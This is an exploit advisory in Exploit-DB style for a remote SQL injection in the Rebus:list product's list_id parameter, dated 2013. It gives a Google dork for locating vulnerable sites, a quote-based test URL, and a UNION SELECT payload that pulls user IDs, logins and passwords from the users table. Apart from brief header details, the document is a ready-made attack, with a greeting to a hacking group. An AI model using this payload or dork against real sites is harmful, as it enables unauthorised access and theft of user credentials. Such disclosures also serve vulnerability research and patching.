Rebus:list suffers from a remote SQL injection vulnerability.
346eae0666cf8b6d57c06d6863f4273a4dc4aad8a7f734a187ea2a43318b2d8a
# Exploit Title: Rebus:list SQL Injection Vulnerability
# Date: 3/18/2013
# Vendor Homepage: http://www.ptfs-europe.com/products/rebus/rebuslist/
# Author: Robert Cooper (robert.cooper [at] areyousecure.net)
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters: list_id=
# Google Dork: intext: Powered by rebus:list
##############################################################
Exploit:
http://example.com/list.php?list_id=2'
http://example.com/list.php?list_id=-2 union all select 1,2,group_concat(user_id,0x3a,login,0x3a,password) FROM users--
##############################################################
http://www.areyousecure.net
# Shouts to the Belegit crew